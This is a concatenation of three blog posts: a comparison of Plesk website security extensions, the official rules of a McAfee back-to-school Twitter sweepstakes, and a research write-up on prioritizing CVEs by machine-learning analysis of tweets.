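Conceptually, greylisting differs from a permanent blocklist in that an offending IP is only blocked for a limited period. A toy sketch of the idea (not BitNinja’s actual implementation; the class name and TTL are illustrative assumptions):

```python
import time

class Greylist:
    """Toy greylist: offending IPs are blocked temporarily, not permanently."""

    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self.entries = {}  # ip -> expiry timestamp

    def flag(self, ip, now=None):
        """Record an offending IP; the block expires after ttl_seconds."""
        now = time.time() if now is None else now
        self.entries[ip] = now + self.ttl

    def is_blocked(self, ip, now=None):
        now = time.time() if now is None else now
        expiry = self.entries.get(ip)
        if expiry is None:
            return False
        if now >= expiry:        # entry expired: drop it from the greylist
            del self.entries[ip]
            return False
        return True
```

An IP flagged once is unblocked automatically when its entry expires, so a legitimate client that briefly misbehaved is not locked out forever.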

On the WAF side, BitNinja analyzes incoming traffic to your server based on different factors and stops attacks against the applications running on it. It utilizes the same WAF model used by Cloudflare and Incapsula. More specifically, it uses Nginx as the reverse proxy engine, ModSecurity as the WAF engine, and a ruleset from OWASP. One downside to BitNinja is that it is unable to constantly update and fine-tune the WAF ruleset or implement other rulesets in real time.

Variti DDoS

The Variti DDoS security extension focuses on protection against DoS and DDoS attacks. They do this by allowing incoming web traffic to pass through a distributed network of filtering nodes. Then, traffic is analyzed in real time and classified as either legitimate or illegitimate. Upon detection of a threat, their Active Bot Protection (ABP) technology immediately blocks this malicious traffic with a response time of less than 50 ms.

Because of this bot protection technology, Variti is able to distinguish traffic between real users and bots, including those coming from the same IP address. Thus, they can also protect against both network and application layer DDoS attacks.  Though it doesn’t offer a WAF, Variti is one of the few DDoS protection tools that are available on Plesk. 

ModSecurity

ModSecurity is arguably one of the most well-known WAFs. It supports web servers such as Apache on Linux and IIS on Windows to protect web applications from malicious attacks. ModSecurity works by checking incoming HTTP requests and, based on the set of rules applied, either allows the HTTP request through to the website or blocks it.

The ModSecurity security extension on Plesk offers both free and paid sets of rules. These include regular expressions used for HTTP request filtering, but you can also apply custom rulesets. This may require extensive knowledge of WAF rules on the system administrator’s part; for example, you may need to manually switch off certain security rules, so maintenance of the rulesets can be a setback for those who are looking for a more hands-off WAF.
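For example, switching off an individual rule that misfires is typically done with the `SecRuleRemoveById` directive in the server configuration. The directives below are real ModSecurity directives, but the rule ID is illustrative only; actual IDs depend on the ruleset in use:

```apache
# Keep the rule engine on, but disable one rule that causes false positives.
# 941100 is shown for illustration; look up the offending ID in your audit log.
SecRuleEngine On
SecRuleRemoveById 941100
```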

Furthermore, there have also been cases where ModSecurity blocks legitimate requests when too many rules are applied.

Cloudflare Servershield 

The Cloudflare Servershield security extension is intended to protect and secure your servers, applications and APIs against DoS/DDoS and other web attacks. While the security extension is primarily used to speed up websites, Cloudflare Servershield also offers WAF and DDoS protection.

Cloudflare’s WAF option and its rulesets can only be enabled on their paid plans – more specifically the Cloudflare Servershield Advanced extension on Plesk. Cloudflare’s WAF uses the OWASP Modsecurity Core Rule Set to inspect web traffic and block illegitimate requests. These OWASP rules are supplemented by Cloudflare’s built-in rules that you can apply with the click of a button. 

As part of their free plan, Cloudflare provides unlimited and unmetered mitigation of DDoS attacks, regardless of the size of an attack.

Imunify360

Imunify360 takes a multi-layered approach to server security. This security extension combines an advanced firewall, WAF, IDS/IPS, and more. Their advanced firewall is also powered by a machine learning engine. They take a proactive defense approach to preemptively stop malware and identify potential attacks on your server.

Their WAF protects web servers from multiple threats, such as DoS attacks, port scans, and distributed brute-force attacks. Their WAF also relies on ModSecurity and is automatically installed on certain versions of Imunify360. Because other third-party ModSecurity vendors’ rulesets may be installed (for example, OWASP or Comodo), these rulesets can generate a large number of false positives and may duplicate Imunify360’s rulesets.

You will need to manually disable other third-party ModSecurity vendors on different hosting panels.

Cloudbric

To simplify the management of website security, Cloudbric’s cloud-based WAF is integrated with the Plesk platform. The Cloudbric WAF extension also includes DDoS protection and SSL certificate renewal automation at no extra cost. 

Instead of painstakingly blocking customers’ IP addresses one by one to keep DDoS attacks under control, Cloudbric blocks these huge amounts of traffic before they reach the site. Cloudbric’s advanced DDoS protection ensures your website stays up and running.

The Cloudbric WAF is designed to install and work with as little human interaction as possible. We handle the security so that customers don’t have to. Unlike ModSecurity which maintains a library of malicious patterns, known as signatures, Cloudbric takes it up a notch by also implementing signature-less detection techniques into the WAF engine. 

Additionally, unlike the rules of ModSecurity that are updated once per month, Cloudbric’s WAF does not require signature updates. 

This signature-less detection technology can also identify and block modified and new web application attacks. Cloudbric’s WAF engine includes 27 unique pre-set rules and AI capabilities to create an advanced threat detection engine to accurately detect and block attacks. 

If your company is dependent on online traffic for business, then protection against DDoS and web application attacks is a must. 

For Plesk users, there are a variety of security extensions to choose from to make the management of security extremely easy for web managers, designers, system administrators, and other web professionals – it all depends on your security needs and whether you are looking for fully managed services or customization. 

If you need assistance with Cloudbric’s Plesk extension, email us at support@cloudbric.com.

The post Top 6 Plesk Security Extensions You Should Consider for Website Security appeared first on Cloudbric.

Backpacks Ready, Pencils Up – It’s Time for a Back-to-School #RT2Win

It’s time to unpack the suitcases and pack up those backpacks! With the summer season quickly coming to an end, it’s time to get those college cybersecurity priorities in order so you can have the best school year yet. As students across the country get ready to embark on—or return to—their college adventure, many are not proactively protecting their data. A recent survey from McAfee found that only 19% of students take extra steps to protect their academic records, which is surprising considering 80% of students have either been a victim of a cyberattack or know someone who has been impacted. In fact, in the first few months of 2019, publicly disclosed cyberattacks targeting the education sector increased by 50%, including financial aid schemes and identity theft.

From data breaches to phishing and ransomware attacks, hitting the books is stressful enough without the added pressure of ensuring your devices and data are secure too. But you’re in luck! Avoid being the cybersecurity class clown and head back to school in style with our A+ worthy Back-to-School RT2Win sweepstakes!

Three [3] lucky winners of the sweepstakes drawing will receive a McAfee Back-to-School Essentials Backpack complete with vital tech and cybersecurity supplies like Beats Headphones, UE BOOM Waterproof Bluetooth Speaker, Fujifilm Instax Mini 9 Instant Camera, DLINK router with McAfee Secure Home Platform, Anker PowerCore Portable Charger and so much more! ($750 value, full details below in Section 6. PRIZES). The best part? Entering is a breeze! Follow the instructions below to enter and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Tuesday, August 13, 2019, at 12:00pm PT. This tweet will include the hashtags: #ProtectWhatMatters, #RT2Win AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #ProtectWhatMatters, #RT2Win AND #Sweepstakes hashtags must be included to be entered.
  • Sweepstakes will end on Monday, August 26, 2019 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday, August 28, 2019, via Twitter direct message.
  • Limit one entry per person.

1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#ProtectWhatMatters, #RT2Win AND #Sweepstakes” for a chance to win a McAfee Back-to-School Essential Backpack (for full prize details please see “Prizes” section below). Three [3] total winners will be selected and announced on August 28, 2019. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Back-to-School #RT2Win Sweepstakes will be conducted from August 13, 2019 through August 27, 2019. All entries for each day of the McAfee Back-to-School #RT2Win Sweepstakes must be received during the time allotted for the McAfee Back-to-School #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Back-to-School #RT2Win Sweepstakes; its duration is as follows:

  • Begins: Tuesday, August 13, 2019 at 12:00pm PDT
  • Ends: Monday, August 26, 2019 at 11:59pm PDT
  • Three [3] winners will be announced: Wednesday, August 28, 2019

For the McAfee Back-to-School #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Back-to-School Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #ProtectWhatMatters, #RT2Win and #Sweepstakes
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags.
  3. Note: Tweets that do not contain the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  4. Limit one entry per person.

Three [3] winners will be chosen for the McAfee Back-to-School #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #ProtectWhatMatters, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Wednesday, August 28, 2019 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.  

3. Eligibility: 

McAfee Back-to-School #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the date the McAfee Back-to-School #RT2Win Sweepstakes begins and who live in a jurisdiction where this prize and the McAfee Back-to-School #RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Back-to-School #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of three [3] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Back-to-School #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by August 28, 2019. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above. 

6. Prizes: 

McAFEE BACK-TO-SCHOOL ESSENTIAL BACKPACK (3)

  • Approximate ARV for Prize: $750
    • McAfee Backpack
    • McAfee Water Bottle
    • McAfee Notebook
    • D-Link Ethernet Wireless Router with McAfee Secure Home
    • McAfee Total Protection, 5 devices, 1-year subscription
    • Beats EP On-Ear Headphones
    • Ultimate Ears BOOM Portable Waterproof Bluetooth Speaker
    • Fujifilm Instax Mini 9 Instant Camera with Mini Film Twin Pack
    • Tile Mate – Anything Finder
    • Anker PowerCore 10000, Portable Charger

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered.

The prize for the McAfee Back-To-School #RT2Win Sweepstakes is a ONE (1) Back-to-School Essential Backpack, complete with the above supplies, for each of the three (3) entrants. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Back-to-School #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Back-to-School #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

7. General Conditions: 

By entering, entrants agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Back-to-School #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of McAfee Back-to-School #RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Back-to-School #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Back-to-School #RT2Win Sweepstakes-related activity, or participation in the McAfee Back-to-School #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee Back-to-School #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Back-to-School #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Back-to-School #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Back-to-School #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Back-to-School #RT2Win Sweepstakes will be handled in accordance with the privacy policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after August 13, 2019 and before August 27, 2019 to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2019 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Backpacks Ready, Pencils Up – It’s Time for a Back-to-School #RT2Win appeared first on McAfee Blogs.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities

Introduction

If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified, they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerability Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable-population representation, normalization, rescoring, and broader expert consensus, which can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue.

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap: prioritizing early-stage CVEs to determine whether they are urgent. Nowcasting is the economic discipline of objectively determining a trend or a trend reversal in real time. In this case, we link social media responses to a CVE after it is released, but before it is scored by CVSS. Scores for CVEs should ideally be available as soon as possible after release, while the current process often hampers prioritization of triage events and ultimately slows the response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the 2016 Mirai botnet incident, a massive number of vulnerable IoT devices were compromised, leading to the largest Denial of Service (DoS) attack on the internet at the time.


Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.


Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated with CVEs by inspecting its URLs or the content hosted at a URL. Specifically, we link a CVE to a tweet if the message body contains a CVE number, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they are also publicly available.
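The CVE-linking step can be sketched with a regular expression over the standard CVE-YYYY-NNNN identifier format; per the single-CVE requirement above, tweets matching zero or multiple CVEs are discarded. The function names are illustrative, not from the original system:

```python
import re

# Standard CVE identifier: "CVE-", a 4-digit year, then 4+ digits.
CVE_PATTERN = re.compile(r"CVE-\d{4}-\d{4,}", re.IGNORECASE)

def extract_cves(text):
    """Return the set of CVE identifiers mentioned in a tweet, uppercased."""
    return {m.upper() for m in CVE_PATTERN.findall(text)}

def link_tweet(text):
    """A tweet is scored only if it maps to exactly one CVE."""
    cves = extract_cves(text)
    return cves.pop() if len(cves) == 1 else None
```

In the full pipeline the same matching would also be applied to the content fetched from any URL in the tweet, not just the message body.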

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods for extracting features from text: (1) n-gram features, and (2) word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-grams or word triples for 3-grams. In other words, they are contiguous sequences of n words from a text. After we extract these n-grams, we can represent the original text as a bag-of-ngrams. Consider the sentence:

A critical vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.
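A minimal sketch of this extraction in Python, using simple whitespace tokenization (a real pipeline would use a proper tweet tokenizer):

```python
from collections import Counter

def ngrams(text, n=2):
    """Return the contiguous n-grams of a whitespace-tokenized text."""
    tokens = text.split()
    return [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]

def bag_of_ngrams(text, n=2):
    """Bag-of-ngrams representation: maps each n-gram to its count."""
    return Counter(ngrams(text, n))
```

For the example sentence, `ngrams("A critical vulnerability was found in Linux.", n=2)` starts with "A critical" and "critical vulnerability", matching the representation described above.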

Word embeddings are a way to learn the meaning of a word from the contexts in which it was previously used, and then represent that meaning in a vector space. Word embeddings capture the meaning of a word by the company it keeps, more formally known as the distributional hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train on terminology specific to cyber security topics; for example, words related to threats include defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier implicitly associate relationships such as:

device + infected = zombie

where an entity called device that has a mechanism called infected applied to it (malicious software infecting it) becomes a zombie.
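As an illustration only, with tiny hand-picked 3-dimensional vectors (real embeddings are learned from large corpora and have hundreds of dimensions), the analogy can be expressed as a nearest-neighbor search under cosine similarity:

```python
import math

def cosine(u, v):
    """Cosine similarity between two vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm = math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v))
    return dot / norm

# Toy vectors, hand-picked for illustration only.
emb = {
    "device":   [1.0, 0.0, 0.0],
    "infected": [0.0, 1.0, 0.0],
    "zombie":   [0.9, 0.9, 0.1],
    "printer":  [0.9, 0.1, 0.0],
}

# device + infected should land nearer to zombie than to unrelated words.
query = [a + b for a, b in zip(emb["device"], emb["infected"])]
nearest = max(("zombie", "printer"), key=lambda w: cosine(query, emb[w]))
```

With these toy vectors, `nearest` is "zombie": the sum of the device and infected vectors points closest to the zombie vector, mirroring the relationship described above.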

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.


Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER allows Windows 10 to be understood as an entity, while October 2018 is treated as part of a date. Without this ability, the text in Figure 3 might be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.
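The entity handling can be sketched as below, under the assumption that an upstream NER system supplies token-level entity spans; `mask_entities` and the `<ENTITY>` token are illustrative names, not from the original system:

```python
def mask_entities(tokens, entity_spans, mask="<ENTITY>"):
    """Replace each named-entity span (start, end) with a single mask token.

    entity_spans are half-open token index ranges, assumed non-overlapping,
    as an NER system such as the one described above would produce.
    """
    out, i = [], 0
    for start, end in sorted(entity_spans):
        out.extend(tokens[i:start])
        out.append(mask)
        i = end
    out.extend(tokens[i:])
    return out
```

A tweet with no entity spans is left unchanged and, per the filtering rule above, would simply be dropped before scoring.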

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.


Figure 4: Tweet showing strong adjective use


Table 1: Log-odds ratios for words correlated with highly-severe CVEs
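One common way to compute log-odds ratios like those in Table 1 is sketched below; the additive smoothing constant is an assumption of this sketch, not a detail reported in the post:

```python
import math

def log_odds_ratio(word_count_severe, total_severe,
                   word_count_other, total_other, alpha=0.5):
    """Smoothed log-odds of a word appearing in severe vs. non-severe tweets.

    Positive values indicate the word is more characteristic of severe
    tweets. alpha is an additive smoothing constant (an assumption here)
    that keeps the ratio finite for rare words.
    """
    p_severe = (word_count_severe + alpha) / (total_severe + 2 * alpha)
    p_other = (word_count_other + alpha) / (total_other + 2 * alpha)
    return (math.log(p_severe / (1 - p_severe))
            - math.log(p_other / (1 - p_other)))
```

A strong adjective that appears in 30 of 100 severe tweets but only 5 of 100 non-severe tweets gets a clearly positive score, matching the intuition behind Table 1.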

Finally, the processed features are evaluated with two different classifiers that output scores predicting relevancy and severity. When a named entity is identified, all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach, where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer, and a fully connected layer, to extract features from the tweets.
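The first model (n-grams plus logistic regression) can be approximated with scikit-learn; the tiny training set and the `<ENTITY>` mask token below are made up purely for illustration:

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Illustrative tweets with named entities already replaced by a mask token.
train_texts = [
    "<ENTITY> critical remote code execution patch immediately",
    "massive wormable flaw in <ENTITY> affects millions",
    "minor logging issue in <ENTITY> low impact",
    "<ENTITY> cosmetic bug unlikely to be exploited",
]
train_labels = [1, 1, 0, 0]  # 1 = severe, 0 = not severe

# Bag of 2- to 4-grams fed into a logistic regression classifier.
clf = make_pipeline(
    CountVectorizer(ngram_range=(2, 4), analyzer="word"),
    LogisticRegression(),
)
clf.fit(train_texts, train_labels)
pred = clf.predict(["critical remote code execution found in <ENTITY>"])
```

The pipeline outputs a severity label per tweet; `predict_proba` would give the score used to rank CVEs downstream.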

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets collected from December 2017 to July 2018. Most notably, 1,000 of the original 6,000 tweets were held out to evaluate the relevancy classifier, and 466 tweets were held out for the severity classifier. To measure performance, we use the Area Under the precision-recall Curve (AUC), a correctness score that summarizes the tradeoff between the two types of errors (false positives vs. false negatives), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54
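As a rough illustration of the metric, average precision is one common way to summarize the area under the precision-recall curve (a sketch, not necessarily the authors' exact computation):

```python
def average_precision(labels, scores):
    """Approximate area under the precision-recall curve:
    the mean of the precision values at each rank where a
    true positive is retrieved."""
    ranked = sorted(zip(scores, labels), reverse=True)
    hits, precisions = 0, []
    for rank, (_, label) in enumerate(ranked, start=1):
        if label == 1:
            hits += 1
            precisions.append(hits / rank)
    return sum(precisions) / max(hits, 1)

# Toy example: positives at ranks 1 and 3 -> (1/1 + 2/3) / 2
ap = average_precision([1, 0, 1], [0.9, 0.8, 0.7])
```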

Next, we evaluate how well this approach can forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of the CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the relevant tweets associated with that CVE. Table 2 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric is precision at top K using our logistic regression model. For example, at K=100 this measures what percentage of the 100 most severe vulnerabilities were correctly predicted. The random model correctly predicted 59 of the top 100, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.
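The precision-at-K metric itself is simple to state in code (an illustrative sketch; the CVE identifiers are placeholders):

```python
def precision_at_k(predicted_ranking, truly_severe, k):
    """Fraction of the top-k predicted vulnerabilities that are
    actually severe (truly_severe is a set of CVE ids)."""
    top_k = predicted_ranking[:k]
    return sum(cve in truly_severe for cve in top_k) / k

# Toy ranking: 2 of the top 3 predictions are truly severe
p = precision_at_k(["CVE-A", "CVE-B", "CVE-C", "CVE-D"],
                   {"CVE-A", "CVE-C", "CVE-D"}, k=3)
```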


Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of operationalized exploits than CVSS. Table 3 shows the precision scores: seven of our top ten most severe CVEs and 21 of our top 100 were found to have been exploited in the wild, compared with one of the top ten and 16 of the top 100 when ranking by CVSS score alone. The recall scores show the percentage of the 134 weaponized vulnerabilities found in our top K examples: our top ten captured seven of the 134 (5.2%), while the CVSS top ten included only one (0.7%) exploited CVE.
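The recall figure quoted above can be computed the same way (a hedged sketch with placeholder CVE ids):

```python
def recall_at_k(predicted_ranking, weaponized, k):
    """Fraction of all known-weaponized CVEs that appear in the
    top-k predictions (7 of 134 in a top-10 list gives ~5.2%)."""
    top_k = set(predicted_ranking[:k])
    return len(top_k & weaponized) / len(weaponized)

# Toy example: 1 of 4 weaponized CVEs appears in the top 2
r = recall_at_k(["CVE-1", "CVE-2", "CVE-3"],
                {"CVE-1", "CVE-3", "CVE-8", "CVE-9"}, k=2)
```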


